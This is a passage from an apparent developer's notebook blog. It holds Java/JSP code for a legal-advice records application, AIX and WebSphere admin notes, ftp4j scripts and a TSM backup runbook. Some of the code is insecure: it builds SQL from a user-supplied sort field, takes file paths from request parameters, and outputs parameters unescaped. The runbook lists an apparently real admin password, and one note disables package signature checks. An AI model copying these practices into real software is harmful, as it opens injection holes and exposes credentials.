        + "cla.legal_advice_date, cla.legal_advice_status, cla.defendant, cla.auth_ref_ind, cla.auth_ref, u.upload_seq_no, u.file_name "
        + "from Enactment e, Chapter c, offense_quote o, case_legal_advice cla, legal_advice_upload u "
        + "where e.enact_chap = c.enact_chap and c.Chapter = o.Chapter and o.offense_code = cla.offense_code(+) and "
        + "cla.case_seq_no = u.case_seq_no(+)";
    if (orderBy != null && orderBy.length() > 0) {
      sql += " order by "
          + fieldSort.getSortBy()
          + (fieldSort.getAsc().equals(Boolean.TRUE) ? " asc"
              : " desc") + ", cla.file_no";
    } else {
      sql += " order by c.Chapter, cla.file_no";
      orderBy = "c.chapter";
      fieldSort = new FieldSort();
      fieldSort.setSortBy(orderBy);
      fieldSort.setAsc(Boolean.TRUE);
    }

    request.getSession().setAttribute("lastFieldSort", fieldSort);

    System.out.println("sql = " + sql);
    ResultSet rs = stmt.executeQuery(sql);
    List list = new ArrayList();
    while (rs.next()) {
      EnactmentView view = new EnactmentView();
      Enactment enactment = new Enactment();
      Chapter chapter = new Chapter();
      
      ...
      String enactChap = rs.getString("enact_Chap");
      String title = rs.getString("title");
      String chapterValue = rs.getString("chapter");
      ...

      list.add(view);
    }
    rs.close();
    stmt.close();

    request.setAttribute("list", list);
    request.setAttribute("sortBy", fieldSort.getSortBy());
    if (fieldSort.getAsc().equals(Boolean.FALSE)) {
      request.setAttribute("order", "down");
    } else {
      request.setAttribute("order", "up");
    }

    String savePath = uploadSetting.getString("upload.dir.prosecutions");
    request.setAttribute("savePath", savePath);

    return mapping.findForward("list");
  }

  public ActionForward download(ActionMapping mapping, ActionForm form,
      HttpServletRequest request, HttpServletResponse response)
      throws Exception {
    String id = request.getParameter("id");
    String fileName = "";

    final Connection conn = DbManager.getConnection();
    String sql = "select file_name from legal_advice_upload where upload_seq_no = ?";
    PreparedStatement ps = conn.prepareStatement(sql);
    ps.setString(1, id);
    ResultSet rs = ps.executeQuery();

    if (rs.next()) {
      fileName = rs.getString("file_name");
    }
    rs.close();
    ps.close();

    System.out.println("download file : " + fileName);
    String savePath = uploadSetting.getString("upload.dir.prosecutions");
    FileInputStream in = new FileInputStream(savePath + "/" + id);
    byte[] buffer = new byte[8092];
    int i = 0;
    response.setContentType("application/octet-stream");
    response.setHeader("Content-Disposition", "attachment; filename=\""
        + new String(fileName.getBytes("UTF-8"), "ISO_8859_1") + "\"");

    while ((i = in.read(buffer)) != -1) {
      response.getOutputStream().write(buffer, 0, i);
    }

    response.getOutputStream().flush();
    return null;
  }
}

class FieldSort implements Serializable {
  private String sortBy;
  private Boolean asc;

  public String getSortBy() {
    return sortBy;
  }

  public void setSortBy(String sortBy) {
    this.sortBy = sortBy;
  }

  public Boolean getAsc() {
    return asc;
  }

  public void setAsc(Boolean asc) {
    this.asc = asc;
  }
}

list.jsp (sort, cell merge)

<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>

<script src="js/jquery.js" type="text/javascript"></script>
<script type="text/javascript">
function init(){}

function _w_table_rowspan(_w_table_id,_w_table_colnum){
  _w_table_firsttd = "";
  _w_table_currenttd = "";
  _w_table_SpanNum = 0;
  _w_table_Obj = $(_w_table_id + " tr td:nth-child(" + _w_table_colnum + ")");
  _w_table_Obj.each(function(i){
     if(i==0){
         _w_table_firsttd = $(this);
         _w_table_SpanNum = 1;
     }else{
         _w_table_currenttd = $(this);
         if(_w_table_firsttd.text()==_w_table_currenttd.text()){
              var firstSection = _w_table_firsttd.parent().find('td:eq(4)').text();
              var currentSection = _w_table_currenttd.parent().find('td:eq(4)').text();
              if(firstSection == currentSection){
               _w_table_SpanNum++;
               _w_table_currenttd.hide(); //remove();
               _w_table_firsttd.attr("rowSpan",_w_table_SpanNum);
              }
         }else{
             _w_table_firsttd = $(this);
             _w_table_SpanNum = 1;
         }
     }
 });
}

var sorting = function(title, order){
  var position = 0;
  var header = '';
  $("#result thead th").each(function(index, dom){
    if(title == $(dom).attr('id')){
      position = index;
      header = $(dom).text();
    }
  });

  $("#result thead th:eq(" + position + ")").html("<font color='yellow'>" + header + "</font>&nbsp;<img src='images/arrow_" + order + ".gif'/>");
}

$(function(){
  $("#result thead th").each(function(){
    $(this).css({"cursor":"pointer"});
    $(this).click(function(){
      var id = $(this).attr('id');
      $(":hidden[name='orderBy']").val(id);

      var form = $("form[name='form1']");
      form.submit();
    });
  });

  var sortBy = '<bean:write name="sortBy"/>';
  var order = '<bean:write name="order"/>';

  sorting(sortBy, order);

  for(var i = 1; i < 10; i++){
    _w_table_rowspan("#result", i);
  }
});

</script>

<div id="content_layer" style="z-index:1">
  <form name="form1" method="post" action="legalAdvice.do?reqCode=list" class="form">
    <p class="form_text_h" align="right"><font size="1">AM0101001</font></p>
    <p class="form_text_h">View Legal Advice:</p>
    <table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td>
        <table id="result" border="1">
          <thead>
          <tr>
            <th class="formheader" id="c.chapter">Chapter</th>
            <th class="formheader" id="o.sect_reg">Section/Regulation</th>
            <th class="formheader" id="o.description">Description of Offence</th>
            <th class="formheader" id="cla.file_no">File No.</th>
            <th class="formheader" id="cla.subject">Subject</th>
            <th class="formheader" id="cla.legal_advice_date">Legal Advice Date</th>
            <th class="formheader" id="cla.legal_advice_status">Legal Advice</th>
            <th class="formheader" id="cla.defendant">Defendant</th>
            <th class="formheader" id="cla.auth_ref_ind">Authority Reference</th>
            <th class="formheader" id="u.file_name">File Name</th>
          </tr>
          </thead>
          <tbody>
          <logic:iterate id="view" name="list" type="vo.EnactmentView" scope="request">
          <bean:define id="enactment" name="view" property="enactment" type="vo.Enactment"/>
          <bean:define id="chapter" name="view" property="chapter" type="vo.Chapter"/>
          <bean:define id="offenseQuote" name="view" property="offenseQuote" type="vo.OffenseQuote"/>
          <bean:define id="legalAdviceUpload" name="view" property="legalAdviceUpload" type="vo.LegalAdviceUpload"/>
          <bean:define id="caseLegalAdvice" name="view" property="caseLegalAdvice" type="vo.CaseLegalAdvice"/>
         
          <tr>
            <td nowrap="nowrap">Cap.<bean:write name="enactment" property="enactChap"/></td>
            <td><bean:write name="offenseQuote" property="sectReg"/></td>
            <td><bean:write name="offenseQuote" property="description"/></td>
            <td><bean:write name="caseLegalAdvice" property="fileNo"/></td>
            <td>
            <logic:equal name="caseLegalAdvice" property="subject" value="Nil">
              <bean:write name="caseLegalAdvice" property="subject"/>
            </logic:equal>
            <logic:notEqual name="caseLegalAdvice" property="subject" value="Nil">
              <a href='legalAdvice.do?reqCode=view&caseSeqNo=<bean:write name="caseLegalAdvice" property="caseSeqNo"/>'><bean:write name="caseLegalAdvice" property="subject"/></a>
            </logic:notEqual>
            </td>
            <td><bean:write name="caseLegalAdvice" property="legalAdviceDateFormat"/></td>
            <td><bean:write name="caseLegalAdvice" property="legalAdviceStatus"/></td>
            <td><bean:write name="caseLegalAdvice" property="defendant"/></td>
            <td><bean:write name="caseLegalAdvice" property="authRefInd"/></td>
            <td><a target='_blank' href='legalAdvice.do?reqCode=download&id=<bean:write name="legalAdviceUpload" property="uploadSeqNo"/>'><bean:write name="legalAdviceUpload" property="fileName"/></a></td>
          </tr>
          </logic:iterate>
          </tbody>
        </table>
        </td>
      </tr>
    </table>
    <input type="hidden" name="orderBy" value=""/>
    <button onclick="addProsecution()">Legal Advice Update</button>
  </form>

add.jsp (leave year checking with JS, form upload)

<%@ page import="vo.*, java.text.SimpleDateFormat"%>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<bean:define id="caseLegalAdvice" name="caseLegalAdvice" scope="request" type="vo.CaseLegalAdvice"/>
<bean:define id="reqCode" name="reqCode" scope="request" type="java.lang.String"/>

<script src="js/jquery.js" type="text/javascript"></script>
<script type="text/javascript">
function init(){}

function calDays(year,month){
  var days=0;
  switch(month){
    case 1: case 3: case 5: case 7: case 8: case 10: case 12: days=31;break;
    case 4: case 6: case 9: case 11: days=30;break;
    case 2: if(isLeapYear(year)) days=29;
    else days=28;
    break;
  }
  return days;
}

function isLeapYear(year){
  if((year %4==0 && year %100!=0) || (year %400==0)) return true;
  else return false;
}

function checkFiles(){
    var exist = false;
    $("input[type='file']").each(function(){
        if($(this).val() != ''){
          exist = true;
        }
    });

    if(!exist){
      alert('No file selected.');
      return false;
    }
    return true;
}

$(function(){
  $("form[name='form1']").submit(function(){
    var regexp = /^(\d{2})\/(\d{2})\/(\d{4})$/;

    if($("input[name='fileNo']").val() == ''){
      alert('File No. is empty.');
      return false;
    }


    if($("input[name='subject']").val() == ''){
      alert('Subject is empty.');
      return false;
    }

    var legalAdviceDate = $("input[name='legalAdviceDate']").val();
    if(legalAdviceDate == ''){
      alert('Legal Advice Date is empty.');
      return false;
    }

    if(!regexp.test(legalAdviceDate)){
      alert('Legal Advice Date is invalid.');
      return false;
    }else{
      var match = regexp.exec(legalAdviceDate);
      var year = parseInt(match[3], 10);
      var month = parseInt(match[2], 10);
      var day = parseInt(match[1], 10);
      var maxDay = calDays(year, month);
      if(day > maxDay){
        alert('Legal Advice Date is invalid.');
        return false;
      }
    }

    if($("#ordinance").val()==null){
      alert('Related Ordinance is empty.');
      return false;
    }

    var checked = false;
    $(":radio[name='legalAdviceStatus']").each(function(){
      if($(this).attr('checked')){
        checked = true;
      }
    });

    if(!checked){
      alert('Legal Advice is empty.');
      return false;
    }

    checked = false;
    $(":checkbox[name^='defendant']").each(function(){
      if($(this).attr('checked')){
        checked = true;
      }
    });

    if(!checked){
      alert('Defendant is empty.');
      return false;
    }

    checked = false;
    $(":radio[name='authRefInd']").each(function(){
      if($(this).attr('checked')){
        checked = true;
      }
    });

    if(!checked){
      alert('Any Authority Reference Mentioned is empty.');
      return false;
    }


    if('<%=reqCode%>' == 'edit'){
      if($(".deleteFile").length < 1){
        if(!checkFiles()){
          return false;
        }
      }
    }else{
      if(!checkFiles()){
        return false;
      }
    }

    var filesNo = '';
    $(".uploadFiles").each(function(){
      filesNo += $(this).find('span').text() + "|" ;
    });

    $(":hidden[name='keepFileNos']").val(filesNo);
    return true;
  });

  $(".deleteFile").click(function(){
    $(this).parent().remove();
  });

  var fileName = 3;
  $("#addFile").click(function(){
    $("#files").append("<input type='file' accept='application/pdf' name='file" + fileName + "' size='40' /><br/>");
    fileName++;
  });

});
</script>

<div id="content_layer" style="z-index:1">
  <form name="form1" method="post" action="legalAdvice.do?reqCode=save" class="form" enctype="multipart/form-data">
    <p class="form_text_h" align="right"><font size="1">XXXX</font></p>
    <p class="form_text_h">Legal Advice Update:</p>
    <table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td class="formheader" width="560">Legal Advice:</td>
      </tr>
      <tr>
        <td valign="top" width="560">
          <table width="100%" border="0" cellspacing="2" cellpadding="0">                     
            <tr>
              <td width="35%"><b>File No.:<span style="color:red">*</span></b></td>
              <td width="65%">
               <input type="text" name="fileNo" size="40" value="" maxlength="50" value='<bean:write name="caseLegalAdvice" property="fileNo"/>'/>
              </td>
            </tr>
            <tr>
              <td width="35%"><b>Subject:<span style="color:red">*</span></b></td>
              <td width="65%">
               <input type="text" name="subject" size="40" value='<bean:write name="caseLegalAdvice" property="subject"/>' maxlength="50" />
              </td>
            </tr>
           
            <tr>
              <td width="35%"><b>Legal Advice Date(dd/mm/yyyy):<span style="color:red">*</span></b></td>
              <td width="65%">
               <input type="text" name="legalAdviceDate" size="40" value='<bean:write name="caseLegalAdvice" property="legalAdviceDate" format="dd/MM/yyyy"/>' maxlength="40" >
              </td>
            </tr>
            <tr>
              <td width="35%"><b>Related Ordinance:<span style="color:red">*</span></b></td>
              <td width="65%">
               <select id="ordinance" name="ordinance" size="7" style="max-width:260px;width:260px">
                <%
                  List ordinance = (List)request.getAttribute("ordinance");
                  String offenseCode = caseLegalAdvice.getOffenseCode();
                  Iterator it = ordinance.iterator();
                  while(it.hasNext()){
                    List items = (List)it.next();
                    if(offenseCode != null && offenseCode.equals(items.get(0))){
                      out.print("<option selected='selected' title='Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "' value='" + items.get(0) + "'>Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "</option>");
                    }else{
                      out.print("<option title='Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "' value='" + items.get(0) + "'>Cap." + items.get(1) + " - " + items.get(2) + " - " + items.get(3) + "</option>");
                    }
                  }
                %>
               </select>
              </td>
            </tr>
            <tr>
              <td><b>Legal Advice:<span style="color:red">*</span></b></td>
              <td><input id="accepted" type="radio" name="legalAdviceStatus" value="a"><label for="accepted">Accepted</label></input><input id="notAccepted" type="radio" name="legalAdviceStatus" value="na"><label for="notAccepted">Not Accepted</label></input><input id="notMentioned" type="radio" name="legalAdviceStatus" value="nm"><label for="notMentioned">Not Mentioned</label></input></td>
            </tr>
            <tr>
              <td><b>Legal Advice Remarks:</b></td>
              <td><textarea name="legalAdviceRemarks" rows="5" cols="40"></textarea></td>
            </tr>
            <tr>
              <td><b>Defendant:<span style="color:red">*</span></b></td>
              <td><input id="employer" type="checkbox" name="defendantEmployer" value="employer"><label for="employer">Employer</label></input><input id="employee" type="checkbox" name="defendantEmployee" value="employee"><label for="employee">Employee</label></input></td>
            </tr>
            <tr>
              <td><b>Any Authority Reference Mentioned(Y/N):<span style="color:red">*</span></b></td>
              <td><input id="authRefIndY" type="radio" name="authRefInd" value="Y"><label for="authRefIndY">Y</label></input><input id="authRefIndN" type="radio" name="authRefInd" value="N"><label for="authRefIndN">N</label></input></td>
            </tr>
            <tr>
              <td><b>Authority Reference:</b></td>
              <td><input type="text" name="authRef" size="40" value="" maxlength="50" /></td>
            </tr>
            <tr>
              <td width="35%" valign="top"><b>File Name:<span style="color:red">*</span></b></td>
              <td width="65%">
               <%
                if(reqCode !=null && reqCode.equals("edit")){
                  final List fileList = caseLegalAdvice.getUploadFiles();
                  Iterator fileIt = fileList.iterator();
                  while(fileIt.hasNext()){
                    String[] file = (String[])fileIt.next();
                    out.print("<div class='uploadFiles'><span style='display:none'>" + file[0] + "</span><a target='_blank' href='upload/prosecutions/" + file[1] + "'>" + file[1] + "</a>&nbsp;<img class='deleteFile' style='cursor:pointer' src='images/Remove-icon.png'/>");
                  }
                }
               %>
               <div id="files">                           
               <input type='file' accept='application/pdf' name='file' size='40' />
               <input type='file' accept='application/pdf' name='file1' size='40' />
               <input type='file' accept='application/pdf' name='file2' size='40' />
               <img src="images/Add-icon.png" style="cursor:pointer" id="addFile"/>
               <br/>
              </td>
            </tr>
          </table>
          <hr noshade size="1" color="#FFFFFF" width="100%">
        </td>
      </tr>
      <tr>
        <td width="560">
          <div align="right">
            <table width="100%" border="0" cellspacing="0" cellpadding="0">
              <tr>
               <td colspan="2"> <%=(errMsg==null) ? "" : errMsg%> </td>
              </tr>
              <tr>
                <td width="61%">
                  <input type="hidden" name="reqCode" value='<%=reqCode%>'/>
                  <input type="hidden" name="keepFileNos" value=''/>
                  <input type="hidden" name="caseNo" value='<%=request.getParameter("caseNo")%>'/>
                  
                  <input type="submit" name="save" value="Save">
                  <%
                    if(reqCode != null && reqCode.equals("edit")){
                      out.print("<input type='submit' name='delete' value='Delete'>");
                    }
                  %>
                </td>
                <td width="39%">
                  <div align="right"> 
                </td>
              </tr>
            </table>
          
        </td>
      </tr>
    </table>
    <p><br>
    </p>
  </form>

2012-04-18

2012-04-18

my aix .profile setting

export PS1=$USER@`hostname`:'$PWD # ' 
set -o vi 

cd /tmp/xx/tools/usr/local/bin 

export PATH=$PATH:$(pwd) 
export PATH=$PATH:`pwd` 
export LIBPATH=/tmp/xx/tools/usr/local/lib

2012-04-12

2012-04-12

Connect server to upload/download by using ftp4j

My machine’s charset is traditional chinese(cp950) while server’s charset is utf-8, it must be decoded/encoded characters when uploading/downloading.

package ftp;

import it.sauronsoftware.ftp4j.FTPClient;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;

import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.PosixParser;

public class FileFetch {

  /**
   * @param args
   * @throws Exception
   */
  public static void main(String[] args) throws Exception {
    run(args);
    //changeFormat("test.txt");
  }

  private static void changeFormat(String file) throws IOException {
    String tmp = "tmp";
    InputStreamReader reader = new InputStreamReader(new FileInputStream(
        file), "cp936");
    OutputStream ow = new FileOutputStream(tmp);

    char[] buffer = new char[4096];

    int len = 0;
    while (len != -1) {
      len = reader.read(buffer);
      if (len != -1) {
        ow.write(new String(new String(buffer, 0, len)
            .getBytes("cp936")).getBytes("utf-8"));
      }
    }
    reader.close();
    ow.close();

    new File(file).delete();
    new File(tmp).renameTo(new File(file));
  }

  private static void run(String[] args) throws Exception {
    Options options = new Options();
    options.addOption("ip", true, "FTP Server IP");
    options.addOption("u", "user", true, "login user name");
    options.addOption("p", "password", true, "login password");
    options.addOption("rr", "remoateRoot", true,
        "remote file path to be fetch");
    options.addOption("rd", "remoteDir", true,
        "remote file path to be fetch");
    options.addOption("d", "drive", true, "storage file path drive");
    options.addOption("f", "file", true, "storage file path");
    options.addOption("dn", "down", false, "flag to down");
    options.addOption("up", "upload", false, "flag to upload");

    CommandLineParser parser = new PosixParser();
    CommandLine line = parser.parse(options, args);

    String ip = line.getOptionValue("ip");
    String user = line.getOptionValue("user");
    String password = line.getOptionValue("password");
    String remoateRoot = line.getOptionValue("remoateRoot");
    String remoteDir = line.getOptionValue("remoteDir");
    String drive = line.getOptionValue("drive");
    String filePath = line.getOptionValue("file");
    if (line.hasOption("down")) {
      getFiles(ip, user, password, remoateRoot, remoteDir, drive,
          filePath, true);
    } else if (line.hasOption("upload")) {
      getFiles(ip, user, password, remoateRoot, remoteDir, drive,
          filePath, false);
    }

  }

  private static void getFiles(String ip, String user, String passwd,
      String remoateRoot, String remoteDir, String drive,
      String fileName, boolean down) throws Exception {
    FTPClient client = new FTPClient();
    String[] ret = client.connect(ip);
    for (String r : ret) {
      System.out.println("out " + r);
    }

    client.login(user, passwd);

    client.changeDirectory(remoateRoot);
    client.changeDirectory(remoteDir);
    String[] fileNames = client.listNames();
    for (String file : fileNames) {
      if (file.matches(fileName)) {
        String filePath = drive + "/" + remoteDir + "/" + file;
        client.setCharset("UTF-8");
        if (down) {
          File dir = new File(drive + "/" + remoteDir);
          if (!dir.exists()) {
            dir.mkdirs();
          }
          OutputStream f = new FileOutputStream(filePath);
          client.download(file, f, -1, null);
          OutputStreamWriter wr = new OutputStreamWriter(f, "UTF-8");
          wr.flush();
          wr.close();
          changeFormat(filePath);
          System.out.println("file " + filePath + " is downloaded.");

        } else {
          client.upload(new File(filePath));
          System.out.println("file " + filePath + " is uploaded.");
        }
      }
    }
  }
}

ftpfetch.bat
java -cp bin;lib/ftp4j-1.7.jar;lib/commons-cli-1.2.jar ftp.FileFetch -ip 10.13.135.81 -u root -p password -rr /piers/apps/uat/installedApps/XXApps.ear/xx.war -d C:\xx -up -rd . -f pros.*

2012-03-15

2012-03-15

Java Subversion Client

Fail to install cc or gcc on aix, and installation of subversion by rpm is fail too.
So download svnkit

1 2	export SVNKIT_LIB=svnkit-1.3.7\lib jsvn co url

2012-03-15

2012-03-15

NFS on AIX

设置客户端的IP

/etc/hosts
10.13.135.47 venus01

添加可以访问的客户端

/etc/exports
/dbbkup -root=venus01

运行

exportfs -a
showmount -e
stopsrc -g nfs
startsrc -g nfs
lssrc -g nfs

客户端运行

mkdir /mnt/bkup
mount 服务器端:/dbbkup /mnt/bkup

Reference

http://www.cio69.com/html/201118/89.html

2012-03-15

2012-03-15

WAS problems

if use Crystal Clear in WAS 5.1, it should config a environment variable ‘DISPLAY=:100’
if use symbolic link in WAS 7, it should config a WebContainer custom property as below
com.ibm.ws.webcontainer.TolerateSymbolicLinks=true

Reference:
http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg1PK87049
http://www.frightanic.com/2010/05/10/solution-to-error-404-srve0190e-on-websphere-6-1/

2012-03-13

2012-03-13

使用Xming連結Aix CDE桌面


<?xml version="1.0"?>
<XLaunch xmlns="http://www.straightrunning.com/XmingNotes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xsi:schemaLocation="http://www.straightrunning.com/XmingNotes XLaunch.xsd" WindowMode="Windowed" 
ClientMode="XDMCP" XDMCPHost="10.13.135.31" Display="0" Clipboard="true"/>

http://mokmoe.blogspot.com/2008/06/xmingaix-cde.html

2012-03-12

2012-03-12

openssh on AIX

在AIX上安装ssh

Download openssh(OpenSSH_5.8.0.6102.tar.Z) and openssl(openssl-0.9.8.1800.tar.Z) from
https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp

Procedure:

Uncompress openssl-0.9.8.1800.tar.Z

1 2	tar xvf openssl smitty install_all

Uncompress OpenSSH_5.8.0.6102.tar.Z

tar xvf openssh
smitty install_all
* INPUT device / directory for software [.] (note a period)
SOFTWARE to install []  using F4
select filesets using F7
openssh.base, openssh.license, openssh.man.en_US,
openssl.base ,openssl.license, and openssl.man.en_US filesets.

Enter yes to accept license agreement

列出有关ssh的已安装文件

lslpp -L|grep ssh

卸装ssh的文件

installp -u openssh.base openssh.license openssh.man.en_US

额外地可以列出安装介质中包含的软件

installp -L -d /dev/cd0

安装失败后如何清理系统

installp -C

Reference:

http://www-01.ibm.com/support/docview.wss?uid=isg3T1012923
http://www.ahinc.com/aix/install.htm

AIX Toolbox

http://gnome.bullfreeware.com/aixtoolbox/RPMS/ppc

Open Source Software Archive for AIX

http://www.bullfreeware.com/
http://www.aixchina.net/?viewnews-16007.html

2012-03-08

2012-03-08

利用ftp4j删除WAS上的heapdump和javacore文件

import it.sauronsoftware.ftp4j.FTPClient;

import java.io.File;

void init(String server, String user, String passwd, String path) {
  FTPClient client = new FTPClient();
  try {
    String[] ret = client.connect(server);
    for (String r : ret) {
      System.out.println("out " + r);
    }
    client.login(user, passwd);

    client.changeDirectory(path);
    
    if (!new File(server).isDirectory()) {
      System.out.println("making directory " + server);
      new File(server).mkdir();
    }
    String[] fileNames = client.listNames();
    for (String file : fileNames) {
      if (file.indexOf("heapdump") != -1
          || file.indexOf("javacore") != -1) {
        System.out.println("download file " + file);
        client.download(file, new File(server + "/" + file));
        client.deleteFile(file);
        System.out.println("file " + file + " deleted.");
      }
    }
    //			client.deleteFile("test.txt");
    //
    client.logout();
    client.disconnect(true);
  } catch (Exception e) {
    // TODO Auto-generated catch block
    e.printStackTrace();
  }
}

void main() {
  String server = "server";
  String user = "root";
  String passwd = "password";
  String path = "/usr/WebSphere/AppServer/logs/dhwas1";
  if (bsh.args.length > 0) {
    server = bsh.args[0];
    user = bsh.args[1];
    passwd = bsh.args[2];
    path = bsh.args[3];
  } else {
    System.out
        .println("usage: java -cp bin;ftp4j-1.7.jar;bsh-2.0b4.jar bsh.Interpreter cleanLog.sh serverName root password /usr/WebSphere/AppServer/logs/dhwas1");
  }
  init(server, user, passwd, path);
}

main();

2012-03-01

2012-03-01

Java mail by SSL

如果没有设置证书，会出现以下Exception:

1	Caused by: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

要解决这个问题，方法有两个：

java的启动参数添加 -Djavax.net.ssl.trustStore=/path/to/jssecacerts

Add properties in java code

1
2
3

Properties systemProps = System.getProperties(); 
systemProps.put( "javax.net.ssl.trustStore", "/path/to/jssecerts"); 
System.setProperties(systemProps);

参考：
http://www.rap.ucar.edu/staff/paddy/cacerts/index.html
http://code.google.com/p/java-use-examples/source/browse/trunk/src/com/aw/ad/util/InstallCert.java

2012-02-21

2012-02-21

TSM的备份命令摘录

   LOCATE TYPE ID:
   tapeutil -f /dev/smc0 inventory | more

  1. Login to TSM: dsmadmc(user:support, pass:lovedh02)

  2. TSM commands:
     CHECK OUT LTO TAPE:
          -----------------------------------------------------
          q libv
          checkout libv LTOLIB DH22S0 remove=no checklabel=no (use label of yesterday tape)
          q pro
          update volume DH22S0 access=unavailable
          q vol DH22S0 format=detailed
          ------------------------------------------------------
  3. Exit TSM: quit

  4. commands:
          tapeutil -f /dev/smc0 inventory | more
          tapeutil -f /dev/smc0 move 4096 16
          tapeutil -f /dev/smc0 inventory | more

  5. CHANGE TAPE
  exit

  6. LOG BACK INTO dsmadmc

  7. CHECK IN LTO TAPE:
          -----------------------------------------------------
          (MAKE SURE THE TAPE NUMBER IS CORRECT, WATCHOUT THE DH31S0 HAS BEEN CHANGED TO DH31S1) (today number)

          delete v DH21S0 discarddata=yes  [notes : delete TODAY's label]

          (MAKE SURE IT IS DONE BEFORE GO INTO THE NEXT LINE)
          q pro

          label libv ltolib search=bulk labelsource=barcode checkin=scratch overwrite=yes

          q req

          rep ???<output 3 digit from command q req>
      (WAIT FOR 2 MINUTES)
          (MAKE SURE THERE'S NO ACTIVE PROCESS FOUND)
          q pro

          q libv

  *******************************************************
  THE FOLLOWINGS ARE COMMAND OUTPUT:

  tsm: TSM>q pro

   Process Process Description  Status
    Number
  -------- -------------------- -------------------------------------------------
        39 LABEL LIBVOLUME      ANR8805I Labelling volumes in library LTOLIB; 0
                                 volumes(s) labelled.\

  tsm: TSM>q pro
  ANR0944E QUERY PROCESS: No active processes found.
  ANS8001I Return code 11.

  tsm: TSM>q libv

  Library Name  Volume Name  Status      Owner       Last Use   Home     Device
                                                                Element  Type
  ------------  -----------  ----------  ----------  ---------  -------  ------
  LTOLIB        DH15S0       Scratch                            4,096    LTO

  *******************************************************
          -----------------------------
  8. Exit TSM: quit
  exit

  --------
  define volume LTOSTGPOOL DH24S0
  query actlog begindate=today begintime=00:00:00 endtime=09:30:00
  q drive
  q path
  update path tsm ltodrive01 srctype=server desttype=drive library=ltolib device=/dev/rmt1 online=yes
  update path tsm ltodrive02 srctype=server desttype=drive library=ltolib device=/dev/rmt2 online=yes
  checkin libv LTOLIB DH21S0 status=scratch

q actlog
help query process
select VOLUME_NAME,ACCESS from volumes where access !='READWRITE'

http://publib.boulder.ibm.com/infocenter/tivihelp/v1r1/index.jsp?topic=%2Fcom.ibm.itsmhpn.doc%2Fb_adminref_hpux217.htm
tsm script : http://www.4bcad.com/doc/misc/tsm_cmds
http://adsm.org/forum/showthread.php?21614-LABEL-LIBVOLUME-0-volume(s)-labeled-0-volume(s)-checked-in

2012-02-17

2012-02-17

Archlinux in VirtualBox

Archlinux安装时候选择

base-devel
kernel header

Sharepoint

mount -t vboxsf sharepoint /mnt/share
download jre1.7u2

Settings

download tomcat
set .profile_bash
export JRE_HOME=/home/jre.1.7.0_02
export PATH=$PATH:$JRE_HOME/bin

网络设置

VirtualBox设置为Bridge模式
查看IP
ip addr
ls /sys/class/net/
设置IP和DNS
cat rc.conf
cat resolv.conf
设置host主机的浏览器访问192.168.56.*的IP不经过proxy
设置ssh

设置root的密码：passwd root

6.建立pacman的本地仓库
https://wiki.archlinux.org/index.php/Pacman_Tips#Installing_packages_from_a_CD.2FDVD.2FISO

由于暂时不能上网，所以在pacman.conf文件里注释掉extra和community部分

简单的测试：

1 2	pacman -Syu pacman -U sqlite3-3.7.7.1-1-i686.pkg.tar.xz

使用netty的example下的HexDumpProxy作为代理服务器，
java -cp netty.jar HexDumpProxy 1099 myproxy 8080

设置环境变量 export http_proxy=http://192.168.56.15:1099

export no_proxy="localhost,127.0.0.1,192.168.56.15"
reference: https://wiki.archlinux.org/index.php/Proxy_settings

使用lynx测试, lynx http://www.google.com
取消pacman.conf的extra和community的注释（因为之前不能上网），在pacman.d/mirrorlist打开任意一个Server
pacman -Syu
下载nginx, pacman -S nginx
查看pacman -Qil nginx
运行nginx出现找不到libpcre.so.1的error
处理

export LD_LIBRARY_PATH=/usr/lib
ldconfig
ln -s /usr/lib/libpcre.so /usr/lib/libpcre.so.1

安装vsftpd，方便可以在windows上使用editplus编辑文件，然后upload到arch。
1
2
pacman -S vsftp
/etc/rc.d/vsftpd start

vsftpd.conf

write_enable=YES
local_enable=YES

注释掉anonymous_enable=YES
由于是standalone模式，所以保持listen=YES

参考
https://wiki.archlinux.org/index.php/Very_Secure_FTP_Daemon
http://os.51cto.com/art/201008/222036.htm

意外情况，安装vsftpd时候，出现很多package的pgp签名有问题的错误，可以参考Archlinux的wiki上pacman-key的文章，我的解决方法是在/etc/pacman.conf中设置SigLevel=Never，不验证package的签名，然后运行

1
2
3

pacman -Syy
pacman -S pacman
pacman -Syu

2012-01-12

2012-01-12

vi 命令

http://www.uic.edu/depts/accc/software/unixgeneral/vi101.html

2012-01-12

2012-01-12

oracle性能相关

以下视图对性能调整有影响：

v$db_object_cache
v$filestat
v$latch$v$latch_children
v$lock&v$locked_object
v$open_cursor
v$parameter
v$parameter&v$system_parameter
v$process
v$rollstat
v$rowcache
v$segstat&v$segment_statistics
v$session
v$session_longops
v$session_wait & v$session_event
v$sesstat
v$sga
v$sgastat
v$sql & v$sql_plan
v$sqltext & v$sqlarea
v$sysstat
v$system_event
v$undostat
v$waitstat replyreload += ',' + 240964;

v$mystat------->mystat ---------->my session stat   当前会话统计

v$sesstat------>sesstat----------->session stat       按会话进行分组统计

v$sysstat------->sysstat----------->system stat       当系统的整体统计

Reference

Oracle性能调整的十大要点 http://www.aixchina.net/home/space.php?uid=44376&do=blog&id=25022

Oracle的SQL语句大全（摘）http://www.aixchina.net/home/space.php?uid=44376&do=blog&id=25080

Oracle内存分配与调整 http://www.aixchina.net/home/space.php?uid=44376&do=blog&id=26579

2011-12-15

2011-12-15

HttpClient连接https网站

import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
